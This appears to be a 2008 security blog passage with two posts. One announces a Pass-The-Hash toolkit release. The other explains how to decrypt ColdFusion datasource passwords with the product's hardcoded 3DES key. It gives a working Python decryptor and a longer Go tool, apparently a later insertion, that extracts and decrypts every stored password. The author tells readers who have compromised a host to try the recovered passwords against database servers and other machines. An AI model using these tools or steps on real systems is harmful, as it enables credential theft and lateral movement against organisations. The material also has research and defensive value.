Wednesday, July 02, 2008

Release of Pass-The-Hash Toolkit v1.4

Source Code:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4-src.tgz

Win32 Binaries:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4.tgz

Documentation/info:
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://oss.coresecurity.com/pshtoolkit/doc/index.html
http://hexale.blogspot.com
http://www.hexale.org/forums

What's new?:
(http://oss.coresecurity.com/pshtoolkit/release/1.4/WHATSNEW)

*Support for XP SP3 for whosthere/iam (whosthere-alt/iam-alt already work on XP SP3 without requiring any update)

*New -t switch for whosthere/whosthere-alt: sets the interval used by the -i switch (by default 2 seconds).

*New -a switch for whosthere/iam: specify the addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR (WARNING!: if you use the wrong values the system may crash)
The idea is that, if you find yourself on a version of Windows where whosthere/iam don't work (and iam-alt/whosthere-alt don't work either), you can load LSASRV.DLL into IDA, run the PASSTHEHASH.IDC script included in the Pass-The-Hash toolkit, and pass the addresses the script finds to the -a switch.

This lets you specify the addresses to whosthere at runtime, without having to recompile the tool.

*New -r switch for iam/iam-alt: create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)

*genhash now outputs hashes using the LM HASH:NT HASH format

*several bugfixes and stuff

Tuesday, July 01, 2008

How to decrypt Coldfusion datasource passwords

ColdFusion stores the passwords for its DataSources encrypted in an XML file under the installation directory:
  • ColdFusion 7: \lib\neo-query.xml (for example: c:\CFusionMX7\lib\neo-query.xml)
  • ColdFusion 8: \lib\neo-datasource.xml (for example: c:\coldfusion8\lib\neo-datasource.xml)


The XML contains nodes like this, one for every datasource:

<var name="password">
<string>maJsuHYMay8zpmptC2yibA==</string>
</var>


Both ColdFusion versions use the same mechanism to encrypt the passwords; you can find it as follows:

  • Find \lib\cfusion.jar
  • Extract its contents
  • Decompile \coldfusion\sql\DataSourceDef.class

(any Java decompiler will do, for example cavaj: http://www.sureshotsoftware.com/cavaj/index.html)

You'll find the following code:


[..]
public class DataSourceDef {

[..]

protected static final String seedval = "0yJ!@1$r8p0L@r1$6yJ!@1rj";

[..]

protected String getPassword() {

if(password == null) { return null; }

if(password.equals("")) { return ""; }

else {

String pwd = null; String secKey = CFPage.generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"); pwd = CFPage.Decrypt(password, secKey, "DESede", "Base64"); return pwd;

}

}

[..]

The seed is a compile-time constant in cfusion.jar, so the same key decrypts the datasource passwords of every ColdFusion 7 and 8 installation. Here's a simple Python script that does it (it needs the pyDes module):

[..]

import pyDes
import base64
import sys


print "Coldfusion v7 and v8 DataSource password decryptor (c) 2008 Hernan Ochoa (hernan@gmail.com)"
print " "

if len(sys.argv) <> 2:
    print "syntax: coldfusion_ds_decrypt.py <base64-encoded encrypted password>"
    sys.exit(1)

pwd = sys.argv[1]
# hardcoded seed from coldfusion/sql/DataSourceDef, used as the 24-byte 3DES key
key = "0yJ!@1$r8p0L@r1$6yJ!@1rj"

k = pyDes.triple_des(key)                       # pyDes defaults to ECB, matching Java's plain "DESede"
d = k.decrypt(base64.decodestring(pwd), "*")    # strip trailing '*' padding after decryption

print "decrypted password: " + d

[..]
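As an added example (my code, not the post's script nor anything from cfusion.jar), here is the same decryption in Go, which has 3DES in its standard library and so needs no extra module; it also goes beyond the script above by pulling every datasource's ciphertext out of the XML file, rejecting ciphertext that is not a whole number of DES blocks, and stripping PKCS5 padding (Java's default for a bare "DESede" transformation) before falling back to the '*' pad the pyDes call assumes. Assumptions: the seed is used raw as the 24-byte DESede key in ECB mode, exactly as the script does; the embedded XML is a constructed, trimmed-down WDDX packet in the shape of neo-datasource.xml with invented datasource names (the first ciphertext is the one quoted above); all function names are mine.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"strings"
)

// Seed hardcoded in coldfusion/sql/DataSourceDef; used raw as the 24-byte DESede key (as the post's script does).
var cfSeed = []byte("0yJ!@1$r8p0L@r1$6yJ!@1rj")

// Constructed sample in the WDDX layout of neo-datasource.xml: invented names, first ciphertext from the post.
const sampleNeoDatasourceXML = `<wddxPacket version='1.0'><header/><data><array length='1'><struct type='coldfusion.server.ConfigMap'>
 <var name='example_ds'><struct type='coldfusion.server.ConfigMap'><var name='username'><string>appuser</string></var>
  <var name='password'><string>maJsuHYMay8zpmptC2yibA==</string></var></struct></var>
 <var name='scratch'><struct><var name='password'><string></string></var></struct></var>
</struct></array></data></wddxPacket>`

// wddxVar is one <var name=".."> node: a <string> leaf or a <struct> holding further vars.
type wddxVar struct {
	Name   string    `xml:"name,attr"`
	String *string   `xml:"string"`
	Vars   []wddxVar `xml:"struct>var"`
}

// ExtractEncryptedPasswords maps each datasource name to the base64 ciphertext held in its
// <var name="password"><string> node, at whatever depth that var sits (CF7 and CF8 files alike).
func ExtractEncryptedPasswords(doc string) (map[string]string, error) {
	var pkt struct {
		Vars []wddxVar `xml:"data>array>struct>var"`
	}
	if err := xml.Unmarshal([]byte(doc), &pkt); err != nil {
		return nil, err
	}
	out := map[string]string{}
	var walk func(parent string, vars []wddxVar)
	walk = func(parent string, vars []wddxVar) {
		for _, v := range vars {
			if v.Name == "password" && v.String != nil {
				out[parent] = strings.TrimSpace(*v.String) // parent is the datasource <var>
			}
			walk(v.Name, v.Vars)
		}
	}
	walk("", pkt.Vars)
	return out, nil
}

// ecb applies one block operation to each 8-byte block on its own: Java's bare "DESede"
// transformation means DESede/ECB/PKCS5Padding, so blocks do not chain.
func ecb(op func(dst, src []byte), in []byte) []byte {
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += des.BlockSize {
		op(out[i:i+des.BlockSize], in[i:i+des.BlockSize])
	}
	return out
}

// stripPadding removes valid PKCS5 padding; otherwise it trims '*', the pad byte the post's pyDes call assumes.
func stripPadding(b []byte) []byte {
	if n := len(b); n > 0 {
		p := int(b[n-1])
		if p >= 1 && p <= des.BlockSize && p <= n && bytes.Count(b[n-p:], []byte{byte(p)}) == p {
			return b[:n-p]
		}
	}
	return bytes.TrimRight(b, "*")
}

// DecryptDataSourcePassword reverses DataSourceDef.getPassword(): base64 decode, 3DES-ECB decrypt
// under the seed, unpad. An empty stored value comes back empty, as in the Java code.
func DecryptDataSourcePassword(b64 string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct)%des.BlockSize != 0 { // a partial block would make ecb() slice past the buffer
		return "", fmt.Errorf("ciphertext is %d bytes, not a multiple of %d", len(ct), des.BlockSize)
	}
	block, err := des.NewTripleDESCipher(cfSeed)
	if err != nil {
		return "", err
	}
	return string(stripPadding(ecb(block.Decrypt, ct))), nil
}

// EncryptDataSourcePassword is the inverse, added only so the decryptor can be checked by
// round trip; ColdFusion's own encryptor is CFPage.Encrypt inside cfusion.jar.
func EncryptDataSourcePassword(pw string) (string, error) {
	block, err := des.NewTripleDESCipher(cfSeed)
	if err != nil {
		return "", err
	}
	pad := des.BlockSize - len(pw)%des.BlockSize
	pt := append([]byte(pw), bytes.Repeat([]byte{byte(pad)}, pad)...)
	return base64.StdEncoding.EncodeToString(ecb(block.Encrypt, pt)), nil
}
```

To use it on a real box, read \lib\neo-query.xml or \lib\neo-datasource.xml into a string, hand it to ExtractEncryptedPasswords, and call DecryptDataSourcePassword on each value; the empty-password case (getPassword() returns "" without decrypting) and a ciphertext that is not a whole number of blocks are both handled rather than crashing the loop.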

If you have compromised a machine running ColdFusion, these passwords are worth recovering so you can test them against the database server and other hosts. If you already control the ColdFusion installation you can execute SQL from a .cfm page without knowing the datasource password, but it is still good to have the passwords: they let you reach the database servers directly, and they are often the same as the ones used for other remote admin accounts (I've seen it, and I'm sure you have seen it too).

If you have access to the Coldfusion administrator page (http://target/CFIDE/Administrator) you can go to the datasources section and you'll see the base64-encoded encrypted password for all the datasources.

  • Go to the 'Data Sources' section
  • Click on a DataSource (e.g.: Test)
  • Look at the HTML source of the resulting page: the base64-encoded encrypted password is in it
This is another method for obtaining the base64-encoded encrypted passwords,
instead of going to the XML files on disk.

Of course, if you have access to the administrator console already, you can do pretty much everything; I'm just saying this is a convenient method to obtain the password for later decryption.